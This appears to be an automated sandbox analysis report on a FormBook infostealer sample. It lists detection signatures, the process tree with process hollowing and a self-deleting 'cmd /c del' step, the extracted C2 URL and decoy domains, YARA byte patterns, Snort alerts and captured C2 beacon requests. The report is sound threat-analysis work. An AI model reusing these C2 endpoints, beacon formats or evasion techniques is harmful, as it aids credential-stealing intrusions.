Analysis Report New_Order.exe

Overview

General Information

Sample Name: New_Order.exe
Analysis ID: 411746
MD5: 74e4eb9afbf8f9c9b285a46ced831979
SHA1: 8d65df9dc971c859f0a86a158d9576f528603410
SHA256: 68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dridex Process Pattern
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • New_Order.exe (PID: 6216 cmdline: 'C:\Users\user\Desktop\New_Order.exe' MD5: 74E4EB9AFBF8F9C9B285A46CED831979)
    • svchost.exe (PID: 6252 cmdline: 'C:\Users\user\Desktop\New_Order.exe' MD5: FA6C268A5B5BDA067A901764D203D433)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6816 cmdline: /c del 'C:\Windows\SysWOW64\svchost.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.voiceclubdubai.com/icsm/"], "decoy": ["roastedorganic.com", "dh1002020.com", "yologgook.com", "bg1133.com", "letsreflectonline.net", "year-action.xyz", "shanghainternational.com", "lanarkshirecleaningservices.com", "ahorradoramente.com", "kantan-sedori.com", "arshpowerelectrical.com", "thepagan.life", "hkequan.com", "1ratedfivegnetwork.com", "desailldada.com", "algaeflipflops.com", "connorneill.com", "fareblog01.com", "fjfortuny.com", "logictech.info", "bathtest.com", "truckwellfreight.com", "guesttransparent.com", "coffeyquiltco.com", "goorganickw.com", "12clyderoad.com", "hdjakdhf.com", "meloncholica.com", "happyfingersfood.com", "web3kit.com", "tmtbarsuppliers.com", "blackradstore.com", "lomejorparasalud.com", "dasabito.com", "shopperzguide.com", "portsalernoboatrental.com", "keywestshaman.com", "clarocrdemo.com", "cafesmexico.com", "lagemanndentistry.com", "nortonviggiano.com", "accuworkflow.com", "cankuntech.com", "the-evening-code.com", "westervillelegends.com", "susanestuart.com", "cunerier.com", "nicustoms.academy", "avocats-biaisetassocies.com", "w-c727or.net", "websitemax.co.uk", "nrlalivelearning.com", "thehostessedit.com", "heauxceaux.com", "case72-paypal.com", "charmboutiques.com", "thelordnelsonwinthorpe.com", "landbkids.com", "mowingpedia.com", "katherinegazda.com", "geacasolaro.com", "masautonomo.com", "quietaustraliansstandup.com", "bellarealestatebkk.com"]}

Yara Overview

Memory Dumps

Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group, Strings:
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 1.2.svchost.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 1.2.svchost.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 1.2.svchost.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group, Strings:
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Dridex Process Pattern
Source: Process started, Author: Florian Roth, oscd.community, Data: Command: 'C:\Users\user\Desktop\New_Order.exe', CommandLine: 'C:\Users\user\Desktop\New_Order.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ProcessId: 6252
Sigma detected: Suspicious Svchost Process
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\user\Desktop\New_Order.exe', CommandLine: 'C:\Users\user\Desktop\New_Order.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ProcessId: 6252
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started, Author: vburov, Data: Command: 'C:\Users\user\Desktop\New_Order.exe', CommandLine: 'C:\Users\user\Desktop\New_Order.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe', ProcessId: 6252

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll, ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: New_Order.exe, Virustotal: Detection: 38%
Source: New_Order.exe, ReversingLabs: Detection: 59%
Yara detected FormBook
Source: Yara match, File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: New_Order.exe, Joe Sandbox ML: detected
Source: 0.2.New_Order.exe.24e0000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.svchost.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: New_Order.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: New_Order.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
Source: Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source: Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\New_Order.exe, Code function: 0_2_0040646B FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\New_Order.exe, Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.voiceclubdubai.com/icsm/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe, DNS query: www.year-action.xyz
Source: global traffic, HTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1 | Host: www.roastedorganic.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1 | Host: www.voiceclubdubai.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1 | Host: www.geacasolaro.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1 | Host: www.charmboutiques.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1 | Host: www.websitemax.co.uk | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1 | Host: www.year-action.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1 | Host: www.hdjakdhf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1 | Host: www.susanestuart.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 75.2.115.196
Source: Joe Sandbox View, IP Address: 23.227.38.74
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: Joe Sandbox View, ASN Name: ARUBA-ASNIT
Source: Joe Sandbox View, ASN Name: TELEPOINTBG
Source: unknown, DNS traffic detected: queries for: www.roastedorganic.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Wed, 12 May 2021 04:11:08 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 253 | Connection: close | X-Varnish: 824312071 | Retry-After: 5 | Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: New_Order.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: New_Order.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000007.00000002.498023186.0000000004EF2000.00000004.00000001.sdmp, String found in binary or memory: https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk
Source: C:\Users\user\Desktop\New_Order.exe, Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
